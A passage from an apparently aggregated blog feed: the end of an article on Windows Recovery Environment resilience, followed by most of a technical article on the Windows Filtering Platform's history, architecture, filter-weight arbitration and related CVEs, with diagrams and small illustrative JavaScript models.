The code is mostly the same. What changed is the *policy* that lets WinRE call Windows Update without an operator at the keyboard. WinPE has shipped networking drivers since 2002 [@ms-winpe-intro], and `winre.wim` has been bootable from a recovery partition since 2009. The breakthrough is the commitment that the recovery environment is allowed to phone home -- and the surrounding program (MVI 3.0, the user-mode AV platform, Intune visibility) that makes it usable as a fleet-scale primitive.

Closing

The Windows Recovery Environment that worked perfectly on July 19, 2024 is the same Windows Recovery Environment that became Microsoft's most important security surface on August 1, 2025. The architecture did not change in the year between. The question we ask of it did.

The CrowdStrike incident did not invent the case for resilience as a security property. It priced it. Two months after the bug check signature csagent+0xe14ed made the rounds, Microsoft and the MVI cohort sat down at WESES to argue out what would become MVI 3.0 [@ms-weses]. Three months after that, the Ignite 2024 keynote committed to Quick Machine Recovery and to a user-mode antimalware platform [@ms-wri-ignite-2024]. Five months after that, the first QMR code shipped on the Beta Channel [@ms-qmr-insider-mar2025]. Twelve months after the incident, MVI 3.0 was binding [@ms-wri-ignite-2025]. Thirteen months after, QMR went generally available -- and BitUnlocker had been patched a month earlier in the July 2025 cumulative update. Sixteen months after, Microsoft published the rebuild-without-shipping-hardware roadmap [@ms-wri-ignite-2025].

WRI does not eliminate the trade-off between recoverability and attack surface. It moves the trade-off to a curve where the per-device cost of a fleet-down event is not bounded by human attention, and where the recovery code path is hardened by the same vendor's offensive-research team. Those are different curves than the ones the platform was on in July 2024. They are not the curves a textbook chapter on Windows internals would have predicted in 2014. They are also still the curves of a single vendor's program, anchored on a small number of blog posts and Microsoft Learn pages, and the work of validating them belongs in every fleet that depends on Windows for availability.

If WinRE worked perfectly on July 19, 2024 and that was the problem, the test of WRI is whether the next July 19 never makes the news.

Windows Filtering Platform: The Kernel-Mode Firewall You Don't See

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

Open wf.msc. Right-click "Inbound Rules," click "New Rule," fill in the form, click OK. You think you just configured a firewall. What you actually did was register one filter, inside one sublayer, at one of roughly sixty filtering layers in the kernel-mode classification path of a platform you have never named. The same platform is also running IPsec, container networking, Microsoft Defender for Endpoint's network protection, and every third-party EDR's network-telemetry pipeline on the Windows host you are using right now.

The Windows Filtering Platform (WFP) is the kernel- and user-mode service Microsoft shipped with Windows Vista in November 2006 to replace four mutually-incompatible XP-era hooks: NDIS intermediate drivers, the filter-hook IOCTL on `\Device\Ipfilterdriver`, Winsock Layered Service Providers, and TDI filter drivers. It is the substrate beneath Windows Defender Firewall, Windows IPsec, WinNAT, the Hyper-V Extensible Switch, Defender for Endpoint Network Protection, and every third-party EDR's network telemetry. WFP is not a firewall. It is the platform that a firewall is one consumer of. It arbitrates competing security products deterministically through 64-bit filter weights inside priority-ordered sublayers, and that arbitration model is the load-bearing reason third-party callouts can finally coexist on the same host. The same kernel-extensibility tax that doomed the pre-WFP hooks now resurfaces as a steady drip of Base Filtering Engine elevation-of-privilege CVEs (CVE-2023-29368, CVE-2024-38034) -- the running cost of a platform sophisticated enough to host every downstream network-security feature Windows ships.

1. You Just Clicked OK on Sixty Filtering Layers

The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature is a configuration of the same engine.

That is the central claim of this article, and it is the kind of statement that sounds like marketing until you trace the actual wires. Trace them once and you stop seeing "Windows Defender Firewall" and "IPsec" and "Windows containers" as separate products. They are all clients of the same kernel/user-mode service, configuring the same filter engine, arbitrated by the same Base Filtering Engine, classified across the same approximately sixty FWPM_LAYER_* identifiers [@wfp-layers].

Windows Filtering Platform (WFP): Microsoft's cross-mode network-traffic filtering service, introduced in Windows Vista and Windows Server 2008. WFP "is designed to replace previous packet filtering technologies such as Transport Driver Interface (TDI) filters, Network Driver Interface Specification (NDIS) filters, and Winsock Layered Service Providers (LSP)" [@wfp-start]. The platform has five components: the Filter Engine, the Base Filtering Engine, a set of kernel-mode shims, callout drivers, and the management API [@wfp-about].

Base Filtering Engine (BFE): A Windows service named `bfe` that, in Microsoft's own words, "controls the operation of the Windows Filtering Platform" and "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. The BFE is not the Windows Firewall. The Windows Firewall is a separate service (`MpsSvc`) that talks to the BFE.

The naming is the first thing that trips readers. There is a service called BFE and a service called MpsSvc. They live in different rows of Get-Service output. They have different binary backings. The dependency arrow runs one way: MpsSvc requires BFE, never the other direction. That asymmetry, which seems pedantic, turns out to be load-bearing for the rest of the story. WFP is the platform. The firewall is a tenant.

Key idea: The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature -- Windows Defender Firewall with Advanced Security, Windows IPsec, WinNAT and container networking, the Hyper-V Extensible Switch, Microsoft Defender for Endpoint Network Protection, every third-party EDR with a network filter -- is a configuration of the same engine [@forshaw-2021].

If WFP is the engine, what was there before it? Why did Microsoft need to build a platform when Windows XP SP2 had already shipped a firewall?

2. Before WFP -- An Internet on Fire

April 2004. Sasser is propagating through the LSASS RPC interface on port 445, infecting unpatched Windows machines within minutes of their first cable plug. Microsoft has just shipped Windows XP SP2, with the Internet Connection Firewall rebranded as "Windows Firewall" and turned on by default for the first time [@wiki-winfw]. Wikipedia notes that "the ongoing prevalence of these worms through 2004 resulted in unpatched machines being infected within a matter of minutes," and that Microsoft "switched it on by default since Windows XP SP2." XP SP2 reached general availability on August 25, 2004 [@wiki-winfw]. That fixed the worm problem. It did not fix the plumbing problem.

The plumbing problem was that third-party security vendors were already hooking the Windows network stack at four different, mutually incompatible places, none of which arbitrated with the others. ZoneAlarm, Norton Internet Security, McAfee, Kerio, Check Point, BlackICE, and a dozen others were shipping kernel drivers that bolted onto Windows wherever they could find a callable surface [@wiki-winfw][@forshaw-2021]. They picked four families.

Network Driver Interface Specification (NDIS) intermediate drivers. NDIS 5.x exposed a profile called the intermediate driver that sat below the protocol stack and above the miniport. A vendor could install a driver that saw every Ethernet frame on the way up and every IP packet on the way down. The price was complexity: NDIS intermediate drivers had to participate in the entire NDIS binding state machine, and Microsoft's own documentation later admitted that the model was painful enough that the platform team replaced it with the much simpler NDIS Lightweight Filter (LWF) in NDIS 6.0 [@ndis-filter].

Filter-hook drivers on \Device\Ipfilterdriver. The IP filter driver exposed a single IOCTL, IOCTL_PF_SET_EXTENSION_POINTER, that registered a single callback function the kernel would invoke on every received or transmitted IP packet [@ipfilter-legacy]. There was one callback pointer per machine. IPv4 only. Network layer only. No documented contract for what happened when a second vendor registered.

Winsock Layered Service Providers (LSPs). A user-mode shim chained into every Winsock application, in process. LSPs had access to per-application context, but their cost was paid in blast radius: Microsoft's own categorisation guide warned that "certain system critical processes such as winlogon and lsass create sockets" and that "a number of cases have also been documented where buggy LSPs can cause lsass.exe to crash. If lsass crashes, the system forces a shutdown" [@lsp-categories].

Winsock Layered Service Provider (LSP): A user-mode DLL that chains into the Winsock service-provider stack of every process that opens a socket. LSPs were the Windows mechanism for content inspection and per-application network rules before Vista. They are still installable, but Microsoft's documentation now categorises which processes must not load them because of the lsass-crash failure mode [@lsp-categories].

TDI filter drivers. The Transport Driver Interface, the legacy kernel interface above TCP/IP, supported a filter-driver pattern that preserved application identity and could veto connections at the transport. It was the cleanest of the four options. It also stopped being a viable target the moment Microsoft deprecated TDI in Vista: "The TDI feature is deprecated and will be removed in future versions of Microsoft Windows. Depending on how you use TDI, use either the Winsock Kernel (WSK) or Windows Filtering Platform (WFP)" [@tdi-legacy].

Four hooks, four failure modes, no arbitration between any of them. In May 2006 Madhurima Pawar and Eric Stenson of Windows Networking walked the WinHEC audience through one number that captured the consequence: firewall and antivirus conflicts accounted for 12 percent of all Windows operating-system crashes [@pawar-stenson-winhec].

Reduces firewall and anti-virus crashes -- 12% of all OS crashes. -- Madhurima Pawar and Eric Stenson, WinHEC 2006 [@pawar-stenson-winhec]

That is the design motivation for WFP in a single slide bullet. The XP-era hook zoo was not a security architecture; it was a steady source of bluescreens. Microsoft's documentation reads, looking back at the era from Vista: "Starting in Windows Server 2008 and Windows Vista, the firewall hook and the filter hook drivers are not available; applications that were using these drivers should use WFP instead" [@wfp-start]. As Forshaw later summarised it, "these firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone" [@forshaw-2021].

```mermaid
flowchart TD
    NIC[Physical NIC] --> MINI[NDIS miniport driver]
    MINI --> IM["NDIS 5.x intermediate driver<br/>(hook #1: NDIS-IM)"]
    IM --> TCPIP[TCPIP.SYS]
    TCPIP -.-> IPF["\Device\Ipfilterdriver<br/>(hook #2: filter-hook IOCTL)"]
    TCPIP --> TDI["TDI transport providers"]
    TDI --> TDIF["TDI filter driver<br/>(hook #3: TDI filter)"]
    TDIF --> AFD[AFD.SYS]
    AFD --> WS2[ws2_32.dll Winsock]
    WS2 --> LSP["Winsock LSP chain<br/>(hook #4: in-process LSP)"]
    LSP --> APP[Application]
```

So why didn't Microsoft just fix the hooks? Why a whole new platform?

3. Why Four Hooks Could Not Be Saved

Picture a Windows XP machine in 2005, four months past SP2. The user, doing what users do, installs two antivirus suites: one from a free trial that came with the laptop, one from work. Each ships a kernel driver. Each one calls IOCTL_PF_SET_EXTENSION_POINTER on \Device\Ipfilterdriver to register a packet-inspection callback [@ipfilter-legacy]. An hour later the machine bluescreens during a Windows Update download.

The Microsoft documentation for the IOCTL is precise about what the call does ("registers filter-hook callback functions to the IP filter driver to inform the IP filter driver to call those filter hook callbacks for every IP packet that is received or transmitted") and silent about what happens if a second driver makes the same call before the first one unregisters [@ipfilter-legacy]. The page does not document chaining semantics. There is no mention of a registration list, a callback array, a refcount, or a priority. The driver writers got to invent that themselves, separately, in shipped products. The crash reports speak for the result.

Note: Microsoft Learn documents the filter-hook registration mechanism on \Device\Ipfilterdriver exactly once, in the legacy reference for IOCTL_PF_SET_EXTENSION_POINTER [@ipfilter-legacy]. The page tells you how to register a callback. It does not tell you what happens when two callers register concurrently. That gap is the architectural bug. The 12-percent-of-OS-crashes number from WinHEC 2006 is the bill [@pawar-stenson-winhec].
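The single-pointer problem is easy to reproduce in miniature. The block below is a toy model, not driver code: `SingleSlotHook` is a hypothetical class, and the last-writer-wins behaviour is an assumption chosen to match the two-vendor scenario this section describes, since the documentation does not say what the real driver does on a second registration.

```javascript
// Toy model of a one-slot hook: a single callback pointer and no chaining.
// Last-writer-wins is an assumption; the real behaviour is undocumented.
class SingleSlotHook {
  constructor() {
    this.callback = null;
  }

  // Registering silently replaces whatever was registered before.
  register(fn) {
    this.callback = fn;
  }

  // Every packet goes to the one registered callback, if any.
  deliver(packet) {
    return this.callback ? this.callback(packet) : 'forward';
  }
}

const hook = new SingleSlotHook();
const seenBy = [];

hook.register(() => { seenBy.push('vendorA'); return 'forward'; });
hook.register(() => { seenBy.push('vendorB'); return 'forward'; });

hook.deliver({ proto: 'tcp', dst: '10.0.0.5' });
console.log(seenBy); // only 'vendorB' saw the packet
```

Vendor A's callback is never invoked and nothing tells it so. A chaining contract would need the slot to hold an ordered list and a rule for combining verdicts, which is the arbitration problem the later sections of this article turn to.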

Each of the four pre-WFP hooks had a specific architectural flaw. Together those flaws define what WFP had to be.

Filter-hook (IpFilterDriver). One callback pointer per machine; no arbitration; IPv4 only; network layer only. Two security products fight over one callback, and there is no documented way to chain them. Failure: arbitration impossible, vendor coexistence accidental.

NDIS 5.x intermediate driver. High complexity, no application identity (it sees frames, not processes), install-order-dependent binding chains. Microsoft's own assessment of the model, written for the LWF replacement that came in 2006, is: "Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. Failure: too low for app-aware policy, too painful to write.

TDI filter. Preserved application identity. Vetoed connections at the transport boundary. Architecturally the cleanest of the four. Then Microsoft deprecated TDI in Vista [@tdi-legacy] and the substrate evaporated. Failure: the floor disappeared.

Winsock LSP. In-process. User mode. Bypassable by any program that called Nt* system services directly. And, as the Microsoft categorisation page documents, a buggy LSP that crashes LSASS will take down the entire machine [@lsp-categories]. Failure: in process, bypassable, lethal when buggy.

| Pre-WFP hook | Layer | App identity | Multi-vendor | Failure mode | Successor |
|---|---|---|---|---|---|
| Filter-hook (`IpFilterDriver`) | Network (L3) | No | No documented contract for chaining | Arbitration impossible [@ipfilter-legacy] | WFP filter at `INBOUND_IPPACKET_*` |
| NDIS 5.x intermediate | Data link (L2) | No | Install-order dependent | Too low for app-aware rules; complex [@ndis-filter] | NDIS Lightweight Filter (LWF) |
| TDI filter | Transport (L4) | Yes | Yes (chainable) | Substrate deprecated in Vista [@tdi-legacy] | WFP ALE + Winsock Kernel (WSK) |
| Winsock LSP | Above sockets (user mode) | Yes | Chainable in-process | In-process bypass; lsass blast radius [@lsp-categories] | WFP ALE; LSP retained for non-security uses |

Walk those failure modes column by column and a design constraint set falls out. Whatever Microsoft was going to build had to:

1. Arbitrate multiple vendors deterministically. No more "first IOCTL wins."
2. Carry application identity through to the inspection point.
3. Concentrate inspection at one platform, not four.
4. Run out of process where possible. A buggy callout cannot be allowed to take down LSASS.
5. Resolve conflicts predictably, with rules a third-party developer can read and design against.

```mermaid
sequenceDiagram
    participant A as Vendor A installer
    participant B as Vendor B installer
    participant K as \Device\Ipfilterdriver
    participant P as IP packet path
    A->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_A)
    Note over K: callback = callback_A
    B->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_B)
    Note over K: callback = callback_B (no chaining contract)
    P->>K: packet arrives
    K->>B: callback_B(packet)
    Note over A: callback_A no longer invoked, vendor A stops working
    A->>K: re-register callback_A
    Note over K: race: pointer flips again
    K--xP: inconsistent state, BSOD
```

Vista shipped November 2006. What did the architects build to satisfy all five constraints at once?

4. The Evolution -- Five Generations of WFP

May 23-25, 2006, Seattle. Madhurima Pawar, Program Manager in Windows Networking, and Eric Stenson, Development Lead in Windows Networking, stand in front of a hostile room of third-party firewall ISVs at WinHEC and present "Windows Filtering Platform And Winsock Kernel: Next-Generation Kernel Networking APIs." Slide 6 carries the design motivation that this article opened on: 12 percent of all OS crashes are firewall and AV conflicts. Slide 7 carries the architecture diagram [@pawar-stenson-winhec]. Six months later Vista shipped, with the filter-hook and firewall-hook drivers gone from the system and a new platform in their place [@wfp-start]. Windows Vista was released to manufacturing on November 8, 2006, and made generally available to consumers on January 30, 2007 [@wiki-vista].

Generation 1: WFP v1 in Vista and Server 2008

WFP v1 introduced five named components. They are still the components the platform ships today. Microsoft's own "About Windows Filtering Platform" page enumerates them: the Filter Engine ("the core multi-layer filtering infrastructure, hosted in both kernel-mode and user-mode"); the Base Filtering Engine ("a service that controls the operation of the Windows Filtering Platform"); shims ("kernel-mode components that reside between the kernel-mode network stack and the filter engine"); callout drivers; and the management API [@wfp-about].

Filter engine: The core of WFP. Microsoft's WDK reference defines it as "a component of the Windows Filtering Platform that stores filters and performs filter arbitration. Filters are added to the filter engine at designated filtering layers so that the filter engine can perform the desired filtering action (permit, drop, or a callout). If a filter in the filter engine specifies a callout for the filter's action, the filter engine calls the callout's classifyFn function" [@wfp-filter-engine]. The engine is hosted in both kernel mode and user mode; its kernel classification path runs primarily inside `NETIO.SYS` [@forshaw-2021].

Shim: A kernel-mode bridge between a specific network stack module and the WFP filter engine. Vista shipped six shims: the Application Layer Enforcement (ALE) shim, the Transport Layer Module shim, the Network Layer Module shim, the ICMP Error shim, the Discard shim, and the Stream shim [@wfp-about]. Each shim invokes the filter engine at one or more `FWPM_LAYER_*` identifiers when traffic crosses it.

The most consequential of those six shims is ALE.

Application Layer Enforcement (ALE): "A set of Windows Filtering Platform (WFP) kernel-mode layers that are used for stateful filtering" [@wfp-ale]. ALE keeps per-connection state across packets, and -- this is the line that separates ALE from the rest of the platform -- "ALE layers are the only WFP layers where network traffic can be filtered based on the application identity -- using a normalized file name -- and based on the user identity -- using a security descriptor" [@wfp-ale]. ALE is why per-application firewall rules became possible in 2006. It is also the layer that classifies AppContainer connections in modern Windows.

ALE pays for stateful filtering once per connection rather than once per packet. The Microsoft Learn page makes the performance claim explicit: at ALE layers, the platform "minimally impacts network performance by processing only the first packet in a connection" [@wfp-about]. Subsequent packets ride the existing flow state. That choice is what lets a per-process firewall rule scale to gigabit network rates.
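The first-packet idea can be sketched as a cache keyed on the connection 5-tuple. This is a toy model under stated assumptions, not how ALE is implemented: `makeFlowClassifier`, the packet fields, and the block-list rule are all hypothetical, and real ALE state covers far more than a cached verdict.

```javascript
// Toy model of first-packet classification: run the policy once per flow,
// then let later packets of the same 5-tuple reuse the cached verdict.
function makeFlowClassifier(policy) {
  const verdicts = new Map(); // flow key -> cached verdict
  let policyCalls = 0;

  const flowKey = (p) => [p.proto, p.srcIp, p.srcPort, p.dstIp, p.dstPort].join('|');

  return {
    classify(packet) {
      const key = flowKey(packet);
      if (!verdicts.has(key)) {
        policyCalls += 1; // expensive path: first packet of a flow only
        verdicts.set(key, policy(packet));
      }
      return verdicts.get(key); // cheap path: reuse flow state
    },
    stats: () => ({ flows: verdicts.size, policyCalls }),
  };
}

// Hypothetical per-application rule, keyed on the sending process path.
const blockList = new Set(['C:\\Tools\\uploader.exe']);
const classifier = makeFlowClassifier((p) => (blockList.has(p.appPath) ? 'block' : 'permit'));

const packet = {
  proto: 'tcp', srcIp: '10.0.0.7', srcPort: 50123,
  dstIp: '203.0.113.9', dstPort: 443, appPath: 'C:\\Tools\\browser.exe',
};
for (let i = 0; i < 1000; i += 1) classifier.classify(packet);
console.log(classifier.stats()); // { flows: 1, policyCalls: 1 }
```

A thousand packets cost one policy evaluation. The trade is memory for the flow table, which is why the cost grows with the number of connections rather than with the packet rate.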

April 12, 2010. Microsoft ships a Windows Filtering Platform driver hotfix rollup, KB981889, that bundles three previously-separate fixes into one package. The Microsoft Support page enumerates them verbatim [@kb981889]:

KB976759 -- "WFP drivers may cause a failure to disconnect the RDP connection to a multiprocessor computer."

KB979278 -- "Using two Windows Filtering Platform (WFP) drivers causes a computer to crash."

KB979223 -- "A nonpaged pool memory leak occurs when you use a WFP callout driver."

Read KB979278 again. Two WFP drivers cause a crash. The XP-era "two AV vendors fight" bug had survived into the new platform, in a different shape: the WFP arbitration model held -- the conflict between filters was deterministic -- but the callout driver lifecycle had not yet been hardened. That distinction is the structural seed of the BFE elevation-of-privilege CVE class more than a decade later. Section 8 returns to it.

Generation 2: WFP v2 in Windows 8 and Server 2012

Windows 8 and Server 2012 shipped a refresh in 2012. The "What's New in Windows Filtering Platform" page enumerates the delta in four bullets [@wfp-whatsnew]:

"Layer 2 filtering: Provides access to the L2 (MAC) layer, allowing filtering of traffic at that layer."

"vSwitch filtering: Allows packets traversing a vSwitch to be inspected and/or modified. WFP filters or callouts can be used at the vSwitch ingress and egress."

"App container management: Allows access to information about app containers and network isolation connectivity issues."

"IPsec updates: Extended IPsec functionality including connection state monitoring, certificate selection, and key management." [@wfp-whatsnew]

Four features, but the second one -- vSwitch filtering -- is the architecturally significant one. With Windows 8, WFP slid under the Hyper-V Extensible Switch. From that release forward, every Hyper-V VM's packet path is a WFP-extensible classification problem, and the same kernel-mode platform that filters host traffic also filters tenant traffic [@wfp-whatsnew].

Generation 3: Windows 10 ALE redirection (2015-2021)

The Windows 10 family added two ALE layers that did not exist in Vista: CONNECT_REDIRECT and BIND_REDIRECT. The "ALE Layers" page lists them at the bottom of its enumeration [@wfp-ale-layers]. Their job is exactly what their names say -- redirect an outbound connection (proxy it through a different address), or redirect a bind (force a process to bind to a different local endpoint). Web proxies, transparent forwarders, and AppContainer policy now had a kernel-side hook that did not exist before. Forshaw's 2021 Project Zero post documents how the modern Windows Defender Firewall pipeline runs through these layers end-to-end: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel... The evaluation is handled primarily by the NETIO driver as well as registered callout drivers" [@forshaw-2021].

Generation 4: URO and the CVE drumbeat (2022-2024)

The most recent generation comes in two parallel tracks. The first is a hardware offload feature. NDIS 6.89, the version of the NDIS driver interface that "is included in Windows 11, version 24H2 and Windows Server 2022 and later," adds support for UDP Receive Segment Coalescing Offload (URO): "this hardware offload enables NICs to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@ndis-689]. Windows 11 24H2 reached general availability on October 1, 2024 [@wiki-win11-24h2].
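A toy coalescer shows the shape of what the quoted passage describes. The matching rule below (same flow key, same payload length, consecutive arrival) is an assumption made for illustration and is not the NDIS 6.89 rule set; `coalesce` and the record fields are hypothetical names.

```javascript
// Toy coalescer: merge consecutive UDP datagrams of one flow into a single
// buffer. The matching rule is an illustrative assumption, not the NDIS rules.
function concatBytes(a, b) {
  const out = new Uint8Array(a.length + b.length);
  out.set(a, 0);
  out.set(b, a.length);
  return out;
}

function coalesce(datagrams) {
  const indications = [];
  for (const d of datagrams) {
    const last = indications[indications.length - 1];
    if (last && last.flow === d.flow && last.segmentSize === d.payload.length) {
      // Same flow, same segment size: extend the current buffer.
      last.payload = concatBytes(last.payload, d.payload);
      last.segments += 1;
    } else {
      // Anything else starts a new indication to the stack.
      indications.push({
        flow: d.flow, segmentSize: d.payload.length, payload: d.payload, segments: 1,
      });
    }
  }
  return indications;
}

const seg = (flow, size) => ({ flow, payload: new Uint8Array(size) });
const result = coalesce([seg('A', 1200), seg('A', 1200), seg('A', 1200), seg('B', 512)]);
console.log(result.map((r) => [r.flow, r.segments, r.payload.length]));
// flow A: 3 segments in one 3600-byte buffer; flow B: 1 segment of 512 bytes
```

Four datagrams become two indications. Anything sitting above the coalescing point sees one large packet where the wire carried three.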

The second track is a sequence of elevation-of-privilege CVEs in the Base Filtering Engine. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free with a CVSS base score of 7.0 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow with a CVSS base score of 7.8 [@nvd-2024-38034]. Between the two records, the attack-complexity metric went from AC:H (high) for the 2023 CVE to AC:L (low) for the 2024 one, and the exploitability sub-score rose from 1.0 to 1.8 [@nvd-2023-29368][@nvd-2024-38034]. Two data points make a thin trend line, but its direction is that BFE EoP is getting easier to weaponise, not harder.
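The jump from 1.0 to 1.8 follows directly from the attack-complexity change. The sketch below applies the CVSS v3.1 exploitability formula (8.22 x AV x AC x PR x UI) with the specification's scope-unchanged weights. Only the AC values come from this article; the other three metrics (`AV:L`, `PR:L`, `UI:N`) are an assumption, chosen because they reproduce the two published sub-scores.

```javascript
// CVSS v3.1 metric weights (scope unchanged), per the FIRST specification.
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 },
  UI: { N: 0.85, R: 0.62 },
};

// Exploitability = 8.22 * AV * AC * PR * UI, rounded to one decimal place.
function exploitability(vector) {
  const m = Object.fromEntries(vector.split('/').map((part) => part.split(':')));
  const raw = 8.22 * WEIGHTS.AV[m.AV] * WEIGHTS.AC[m.AC] * WEIGHTS.PR[m.PR] * WEIGHTS.UI[m.UI];
  return Math.round(raw * 10) / 10;
}

// Assumed vectors: only the AC metric is taken from the article.
console.log(exploitability('AV:L/AC:H/PR:L/UI:N')); // 1
console.log(exploitability('AV:L/AC:L/PR:L/UI:N')); // 1.8
```

With everything else held constant, moving AC from 0.44 to 0.77 multiplies the sub-score by 1.75, so the difference between the two records is carried entirely by the attack-complexity metric.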

```mermaid
flowchart TD
    UM["User-mode application<br/>(e.g. wf.msc / netsh / MpsSvc)"] --> API["Fwpm* management API<br/>(fwpuclnt.dll)"]
    API --> BFE["Base Filtering Engine service<br/>(bfe, user mode)"]
    BFE --> FE["Filter Engine<br/>(kernel + user mode)"]
    FE --> KCLI["fwpkclnt.sys<br/>(kernel-mode WFP client / export driver)"]
    FE --> NETIO["NETIO.SYS<br/>(classification path)"]
    NETIO --> ALE["ALE shim"]
    NETIO --> TLM["Transport-Layer shim"]
    NETIO --> NLM["Network-Layer shim"]
    NETIO --> STREAM["Stream shim"]
    NETIO --> ICMP["ICMP-Error shim"]
    NETIO --> DISC["Discard shim"]
    ALE --> COUT["Callout drivers<br/>(IPsec, in-box stealth, EDR, 3rd-party)"]
    TLM --> COUT
    NLM --> COUT
    STREAM --> COUT
    ICMP --> COUT
    DISC --> COUT
```

```mermaid
timeline
    title Five generations of the Windows Filtering Platform
    2006-11 : Windows Vista / Server 2008 -- WFP v1 (filter engine, BFE, six shims, callouts)
    2010-04 : KB981889 hotfix rollup -- three named WFP driver bugs, including two-WFP-drivers crash
    2012-09 : Windows 8 / Server 2012 -- WFP v2 (L2, vSwitch, AppContainer, IPsec extensions)
    2015-21 : Windows 10 -- ALE CONNECT_REDIRECT / BIND_REDIRECT, AppContainer-aware ALE
    2023-06 : CVE-2023-29368 published (CWE-415 double-free, CVSS 7.0)
    2024-07 : CVE-2024-38034 published (CWE-190 integer overflow, CVSS 7.8)
    2024-10 : Windows 11 24H2 -- NDIS 6.89 adds URO (UDP receive coalescing)
```

Timeline sources, in row order: WinHEC 2006 and the Vista release on the Microsoft Learn WFP start page [@pawar-stenson-winhec][@wfp-start]; KB981889 [@kb981889]; the "What's New" page [@wfp-whatsnew]; ALE Layers [@wfp-ale-layers] and Forshaw 2021 [@forshaw-2021]; the NVD records for CVE-2023-29368 and CVE-2024-38034 [@nvd-2023-29368][@nvd-2024-38034]; NDIS 6.89 introduction and the Windows 11 24H2 GA date [@ndis-689][@wiki-win11-24h2].

Five generations, one engine, no replacements. Why does the same engine still ship in 2026? What is the architectural insight that made it last?

5. Sublayers, Weights, and Veto -- The Arbitration Insight

Here is the question every Windows administrator has wondered about: how do two competing security products coexist on the same machine without crashing each other? Before Vista the honest answer was, "they didn't, mostly, and when they did it was an accident." After Vista the honest answer is, "WFP arbitrates them deterministically." The mechanism is the load-bearing piece of the platform, and it is built out of two ideas.

Idea 1: Sublayers and weights

Microsoft's "Filter Arbitration" page describes the algorithm in two sentences that almost no Windows administrator has read:

"Each filter layer is divided into sub-layers ordered by priority (also called weight). Network traffic traverses sub-layers from the highest priority to the lowest priority... Within each sub-layer, filters are ordered by weight. Network traffic is indicated to matching filters from highest weight to lowest weight." [@wfp-arbitration]

A layer (say, FWPM_LAYER_ALE_AUTH_CONNECT_V4, the place where outbound IPv4 TCP connection authorization is decided) contains an ordered list of sublayers. Each sublayer contains an ordered list of filters. Sublayer priority orders the sublayers. Filter weight orders the filters within a sublayer. Network traffic walks the structure top-down, sublayer by sublayer, filter by filter, until a terminal action is reached.

Sublayer. A named, priority-ordered subdivision of a WFP filtering layer. Each sublayer owns a list of filters and has its own GUID. Microsoft's recommendation, in the filter-weight documentation, is that independent vendors "create their own sublayer by using `FwpmSubLayerAdd0`" rather than register filters into another vendor's sublayer [@wfp-weight]. Sublayer priority is what lets two vendors coexist without interfering.

Filter weight. A 64-bit value attached to a filter that orders evaluation within a sublayer. The "Filter Weight Assignment" page documents three legal assignment styles: "Set the weight to an FWP_UINT64. BFE uses the supplied weight as is. Set the weight to FWP_EMPTY. BFE automatically generates a weight in the range [0, 2^60). Set the weight to an FWP_UINT8 in the range [0, 15]. BFE uses the supplied weight as a weight range identifier" [@wfp-weight]. Sixteen high-order weight ranges, $[0, 2^{60})$ within each, give vendors a way to carve out non-overlapping neighbourhoods.

The mathematical model is simpler than the prose suggests. Filter weight is an element of $[0, 2^{64})$. A filter at weight $w_1$ runs before a filter at weight $w_2$ inside the same sublayer if $w_1 > w_2$. Sublayer priority orders the sublayers themselves. When a vendor registers its sublayer at, say, priority 0x1000 and chooses filters in the weight range $[2^{60}, 2^{61})$, that vendor has a deterministic neighbourhood that no other vendor will trample, provided the other vendors follow Microsoft's recommendation to call FwpmSubLayerAdd0 and use their own sublayer.

The 16-range partitioning via FWP_UINT8 weights is the mechanism that the platform team baked in to give vendors a coordination protocol without requiring vendors to talk to each other. Microsoft Learn's recommendation, verbatim: "This issue can be prevented by having callouts create their own sublayer by using FwpmSubLayerAdd0" [@wfp-weight].
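The weight model above can be sketched with 64-bit integer arithmetic. This is a minimal illustration, not BFE's implementation: it assumes, as the description of sixteen ranges of width $2^{60}$ implies, that the range identifier occupies the four high-order bits of the weight. The helper names `rangeBounds`, `rangeOf`, and `runsBefore` are hypothetical and exist only for this example.

```javascript
// Model of the 16 weight ranges, using BigInt for 64-bit math.
// Assumption: range identifier r in 0..15 selects [r * 2^60, (r + 1) * 2^60).
const RANGE_BITS = 60n;
const RANGE_COUNT = 16n;

// Half-open bounds [low, high) of one weight range.
function rangeBounds(rangeId) {
  const r = BigInt(rangeId);
  if (r < 0n || r >= RANGE_COUNT) throw new RangeError('range id must be 0..15');
  return { low: r << RANGE_BITS, high: (r + 1n) << RANGE_BITS };
}

// Which of the 16 ranges a full 64-bit weight falls into.
function rangeOf(weight) {
  return Number(BigInt.asUintN(64, weight) >> RANGE_BITS);
}

// Inside one sublayer, the filter with the higher weight is evaluated first.
function runsBefore(w1, w2) {
  return w1 > w2;
}

const r1 = rangeBounds(1);
console.log(r1.low === 2n ** 60n, r1.high === 2n ** 61n); // true true
console.log(rangeOf(2n ** 60n + 12345n));                  // 1
```

Two vendors that pick different range identifiers can never produce overlapping weights under this model, which is the coordination property the paragraph above describes.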

Idea 2: Block-overrides-Permit with Veto

Filter arbitration is actually two passes, not one. Within a single sublayer, the engine evaluates the filters that match in weight order from highest to lowest, and stops at the first filter that returns Permit or Block. That first matching filter wins; lower-weight filters in the same sublayer never run. The engine then performs the same pass on the next sublayer down. Once every sublayer has produced a verdict, the BFE composes those per-sublayer verdicts into one per-layer decision -- and that is where Block-over-Permit and the soft/hard override flag come in. Filter Arbitration states the second pass:

